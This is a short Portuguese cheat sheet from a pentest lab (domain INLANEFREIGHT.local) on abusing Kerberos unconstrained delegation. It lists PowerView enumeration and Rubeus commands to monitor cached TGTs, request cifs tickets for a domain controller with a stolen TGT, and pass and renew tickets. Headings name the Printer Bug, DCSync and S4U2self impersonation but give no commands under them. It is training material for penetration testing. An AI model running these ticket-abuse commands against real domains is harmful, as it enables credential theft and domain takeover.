Unconstrained Delegation - Computers

Descrição

  • Unconstrained Delegation era o único tipo de delegação disponível no Windows 2000.

  • Quando um usuário solicita um ticket de serviço para um servidor com delegação irrestrita habilitada, o TGT do usuário é incluído no ticket de serviço.

  • Isso permite que um atacante que comprometa esse servidor abuse desses tickets.

Enumeração

  • Grupos e membros

Import-Module .\PowerView.ps1
Get-DomainGroup -MemberIdentity sarah.lafferty

Captura e Monitoramento de Tickets

  • Monitorar tickets armazenados

.\Rubeus.exe monitor /interval:5 /nowrap

Abuso de Tickets

  • Solicitar outro ticket com um TGT

.\Rubeus.exe asktgs /ticket:<TICKET> /service:cifs/dc01.INLANEFREIGHT.local /ptt
  • Renovar ticket

.\Rubeus.exe renew /ticket:<TICKET> /ptt
  • Usar ticket para acesso

Printer Bug (Spooler)

  • Monitorar tickets em um terminal

  • Executar ataque de spooler em outro terminal

DCSync com Mimikatz

Rubeus – Solicitação de TGT direto

  • Solicitar TGT com hash RC4 de Sarah

Acesso ao DC com ticket de Sarah

S4U2self / Impersonação

  • Impersonar Administrator com S4U2self

  • Usar acesso

Last updated